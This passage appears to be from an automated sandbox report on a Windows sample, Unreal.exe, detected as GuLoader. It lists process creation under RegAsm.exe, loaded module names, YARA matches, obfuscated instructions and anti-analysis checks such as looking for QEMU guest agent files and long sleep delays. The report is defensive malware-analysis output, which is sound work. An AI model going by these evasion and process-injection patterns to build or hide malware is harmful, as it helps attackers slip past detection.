        Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,
        Source: C:\Users\user\Desktop\Unreal.exeFile created: C:\Users\user\AppData\Local\Temp\~DF256AB04E6125E28E.TMPJump to behavior
        Source: classification engineClassification label: mal92.troj.evad.winEXE@14/8@2/1
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3060:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7508
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3060:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:304:WilStaging_02
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE1AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 0000000C.00000003.5557061554.0000000005D84000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 0000000C.00000003.5552355608.0000000002833000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb1I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 0000000C.00000003.5571125548.0000000005D73000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.5559519325.0000000005D62000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 0000000C.00000003.5554021670.000000000282C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 0000000C.00000003.5560045007.0000000002839000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5574373177.0000000006349000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 0000000C.00000003.5553326030.0000000005977000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: WLDP.pdb( source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb6X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb@X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 0000000C.00000003.5557034969.0000000005D7F000.00000004.00000001.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb( source: WerFault.exe, 0000000C.00000003.5554127676.000000000276B000.00000004.00000001.sdmp
        Source: Binary string: cryptsp.pdb( source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.5550573742.0000000002794000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 0000000C.00000003.5553459243.0000000005993000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: gpapi.pdb( source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb=I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb( source: WerFault.exe, 0000000C.00000003.5579261146.0000000005D95000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 0000000C.00000003.5552657974.000000000523E000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb( source: WerFault.exe, 0000000C.00000003.5553896637.0000000002816000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb.X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb"X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 0000000C.00000003.5578930131.000000000657C000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdbLX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 0000000C.00000003.5560528570.0000000005D57000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdbTX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 0000000C.00000003.5569202232.000000000599E000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb( source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 0000000C.00000003.5552283718.0000000002827000.00000004.00000001.sdmp
        Source: Binary string: WLDP.pdbZX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdbFX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 0000000C.00000003.5573477863.0000000005D79000.00000004.00000001.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 0000000C.00000003.5553966425.0000000002821000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 0000000C.00000003.5553602111.0000000005228000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdb source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb( source: WerFault.exe, 0000000C.00000003.5595558950.0000000006B6A000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb( source: WerFault.exe, 0000000C.00000003.5557732587.0000000005233000.00000004.00000001.sdmp
        Source: Binary string: ck.pdb) source: WerFault.exe, 0000000C.00000003.5565025438.0000000005F5B000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdb source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb7I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 0000000C.00000003.5564336996.0000000005982000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdboJ source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb( source: WerFault.exe, 0000000C.00000003.5579357046.0000000005DA6000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdbxX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: fwpuclnt.pdb( source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdb source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: ole32.pdbrX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 0000000C.00000003.5552632966.0000000005239000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb<X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb0X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 0000000C.00000003.5586901895.0000000006598000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb( source: WerFault.exe, 0000000C.00000003.5581399598.0000000006576000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 0000000C.00000003.5552064732.0000000002805000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb( source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 0000000C.00000003.5559728887.0000000005D8A000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb(X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: wininet.pdb( source: WerFault.exe, 0000000C.00000003.5553538636.00000000059A4000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp

        Data Obfuscation:

        Yara detected GuLoader
        Source: Yara match | File source: 00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_00406669 push ds; iretd
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_00404623 push esp; iretd
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_004064A6 push ebx; retf
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_0040276E push ebx; iretd
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_02240A49 push FFFFFF86h; retf
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_022444AF push FFFFFFF7h; iretd
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_022442DD push esi; retf
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_0224310D push ss; retf
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_02243169 push ss; retf
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_022411CC push ds; iretd
        Source: C:\Users\user\Desktop\Unreal.exe | Code function: 0_2_022447D0 push ss; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D52167 push DE1ECAFBh; retf DE1Eh
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D55AED push eax; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D5628C push ds; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D53221 push esp; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D51B33 push cs; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D50B2A push FFFFFFDEh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D52544 push ebp; retf
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742DCB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
        Source: C:\Users\user\Desktop\Unreal.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect Any.run
        Source: C:\Users\user\Desktop\Unreal.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Unreal.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: Unreal.exe, 00000000.00000002.3501073850.00000000005B4000.00000004.00000020.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2724 | Thread sleep time: -225000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D599BA rdtsc
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | Process information queried: ProcessInformation
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2B030 FindNextFileW,FindClose,FindFirstFileW,
